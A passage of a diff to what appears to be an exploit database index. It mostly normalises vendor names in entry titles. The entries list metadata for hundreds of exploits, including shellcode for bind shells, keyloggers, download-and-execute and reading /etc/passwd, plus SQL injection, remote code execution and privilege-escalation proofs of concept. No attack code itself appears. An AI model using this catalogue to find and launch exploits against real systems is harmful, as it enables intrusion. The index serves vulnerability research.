String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 -39646,platforms/php/webapps/39646.py,"Wordpress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 -39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 -39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 +39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 +39647,platforms/windows/dos/39647.txt,"Microsoft Windows - Kernel Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 +39648,platforms/windows/dos/39648.txt,"Microsoft Windows - Kernel NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 -39650,platforms/multiple/dos/39650.txt,"Adobe Flash - TextField.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 +39650,platforms/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0 -39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - .mp3 Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0 +39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0 40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0 39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272 -39666,platforms/windows/local/39666.txt,"Windows Kernel - 'win32k.sys' Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 +39666,platforms/windows/local/39666.txt,"Microsoft Windows - Kernel 'win32k.sys' Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80 39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80 -39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0 +39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0 39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443 39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0 -39674,platforms/windows/local/39674.py,"Express Zip 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0 +39674,platforms/windows/local/39674.py,"Express Zip 2.40 - Directory Traversal",2016-04-08,R-73eN,windows,local,0 39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80 39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80 39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80 -39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0 +39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,windows,local,0 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80 39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80 @@ -35914,22 +35917,22 @@ id,file,description,date,author,platform,type,port 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,Metasploit,linux,local,0 -39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 -39704,platforms/php/webapps/39704.txt,"Wordpress leenk.me Plugin 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 -39705,platforms/php/webapps/39705.txt,"Wordpress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 +39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 +39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 +39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80 39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,Metasploit,multiple,remote,80 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80 -39712,platforms/win_x86-64/dos/39712.txt,"Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 +39712,platforms/win_x86-64/dos/39712.txt,"Microsoft Windows - Kernel DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 39713,platforms/windows/dos/39713.c,"Hyper-V - vmswitch.sys VmsMpCommonPvtHandleMulticastOids Guest to Host Kernel-Pool Overflow",2016-04-20,"Google Security Research",windows,dos,0 39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 -39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 +39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0 @@ -35944,15 +35947,15 @@ id,file,description,date,author,platform,type,port 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)",2016-04-25,"David Silveiro",linux,dos,0 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 -39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer - Arbitrary File Upload",2016-04-26,Metasploit,windows,remote,80 +39735,platforms/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload",2016-04-26,Metasploit,windows,remote,80 39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0 -39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 +39740,platforms/windows/dos/39740.cpp,"Microsoft Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 -39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 +39743,platforms/windows/dos/39743.txt,"Microsoft Windows - Kernel win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 39745,platforms/php/webapps/39745.txt,"Observium 0.16.7533 - Authenticated Arbitrary Command Execution",2016-04-29,"Dolev Farhi",php,webapps,80 39746,platforms/cgi/webapps/39746.txt,"Merit Lilin IP Cameras - Multiple Vulnerabilities",2016-04-29,Orwelllabs,cgi,webapps,80 @@ -35961,7 +35964,7 @@ id,file,description,date,author,platform,type,port 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80 -39752,platforms/php/webapps/39752.txt,"Wordpress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 +39752,platforms/php/webapps/39752.txt,"WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0 39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0 39756,platforms/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution",2016-05-02,Metasploit,linux,remote,8080 @@ -36011,19 +36014,19 @@ id,file,description,date,author,platform,type,port 39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field SEH Overwrite (PoC)",2016-05-11,"Nipun Jaswal",windows,dos,0 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0 -39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0 -39806,platforms/php/webapps/39806.txt,"Wordpress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39807,platforms/php/webapps/39807.txt,"Wordpress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 -39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 -39883,platforms/php/webapps/39883.txt,"Wordpress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 +39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0 +39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 +39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 +39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 +39809,platforms/windows/local/39809.cs,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 +39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0 -39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0 +39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - '.ZIP' Directory Traversal",2016-05-16,hyp3rlinx,php,webapps,0 39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0 39820,platforms/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 @@ -36038,10 +36041,10 @@ id,file,description,date,author,platform,type,port 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 -39832,platforms/windows/dos/39832.txt,"Windows - gdi32.dll Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39833,platforms/windows/dos/39833.txt,"Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39834,platforms/multiple/dos/39834.txt,"Windows - gdi32.dll Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 -39835,platforms/multiple/dos/39835.txt,"Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 +39832,platforms/windows/dos/39832.txt,"Microsoft Windows - gdi32.dll Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39833,platforms/windows/dos/39833.txt,"Microsoft Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39834,platforms/multiple/dos/39834.txt,"Microsoft Windows - gdi32.dll Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 +39835,platforms/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection",2016-05-17,Metasploit,multiple,remote,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80 @@ -36074,9 +36077,9 @@ id,file,description,date,author,platform,type,port 39867,platforms/multiple/dos/39867.py,"MySQL 5.5.45 - procedure analyse Function Denial of Service",2016-05-30,"Osanda Malith",multiple,dos,0 39868,platforms/php/webapps/39868.txt,"Open Source Real Estate Script 3.6.0 - SQL Injection",2016-05-30,"Meisam Monsef",php,webapps,80 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39870,platforms/php/webapps/39870.html,"FlatPress 1.0.3 - Cross-Site Request Forgery Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80 +39870,platforms/php/webapps/39870.html,"Flatpress 1.0.3 - Cross-Site Request Forgery Arbitrary File Upload",2016-05-31,LiquidWorm,php,webapps,80 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80 -39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 +39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash (PoC)",2016-05-31,"David Silveiro",linux,dos,0 @@ -36094,12 +36097,12 @@ id,file,description,date,author,platform,type,port 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)",2016-06-06,"Ali Ghanbari",php,webapps,80 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 -39891,platforms/php/webapps/39891.txt,"Wordpress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 -39892,platforms/php/webapps/39892.php,"Wordpress Creative Multi-Purpose Theme 9.1.3 - Persistent Cross-Site Scripting",2016-06-06,wp0Day.com,php,webapps,80 -39893,platforms/php/webapps/39893.php,"Wordpress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80 -39894,platforms/php/webapps/39894.php,"Wordpress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80 -39895,platforms/php/webapps/39895.php,"Wordpress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80 -39896,platforms/php/webapps/39896.txt,"Wordpress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80 +39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 +39892,platforms/php/webapps/39892.php,"WordPress Creative Multi-Purpose Theme 9.1.3 - Persistent Cross-Site Scripting",2016-06-06,wp0Day.com,php,webapps,80 +39893,platforms/php/webapps/39893.php,"WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80 +39894,platforms/php/webapps/39894.php,"WordPress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80 +39895,platforms/php/webapps/39895.php,"WordPress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80 +39896,platforms/php/webapps/39896.txt,"WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80 39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80 39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80 39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80 @@ -36123,20 +36126,20 @@ id,file,description,date,author,platform,type,port 39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi Remote Code Execution",2016-06-10,Metasploit,cgi,remote,444 39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock)",2016-06-10,Metasploit,cgi,remote,444 39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution",2016-06-10,Metasploit,multiple,remote,8080 -39920,platforms/osx/dos/39920.c,"OS X Kernel - Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 +39920,platforms/osx/dos/39920.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 -39922,platforms/osx/dos/39922.c,"OS X Kernel - Exploitable NULL Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 -39923,platforms/osx/dos/39923.c,"OS X Kernel - Exploitable NULL Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 -39924,platforms/osx/dos/39924.c,"OS X Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 -39925,platforms/osx/dos/39925.c,"OS X Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 -39926,platforms/osx/dos/39926.c,"OS X Kernel - Exploitable NULL Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 -39927,platforms/osx/dos/39927.c,"OS X Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 -39928,platforms/osx/dos/39928.c,"OS X Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0 -39929,platforms/multiple/dos/39929.c,"OS X/iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 -39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 +39922,platforms/osx/dos/39922.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 +39923,platforms/osx/dos/39923.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 +39924,platforms/osx/dos/39924.c,"Apple Mac OS X - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 +39925,platforms/osx/dos/39925.c,"Apple Mac OS X - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value",2016-06-10,"Google Security Research",osx,dos,0 +39926,platforms/osx/dos/39926.c,"Apple Mac OS X - Kernel Exploitable NULL Pointer Dereference in IOAudioEngine",2016-06-10,"Google Security Research",osx,dos,0 +39927,platforms/osx/dos/39927.c,"Apple Mac OS X - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type",2016-06-10,"Google Security Research",osx,dos,0 +39928,platforms/osx/dos/39928.c,"Apple Mac OS X - Kernel Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security 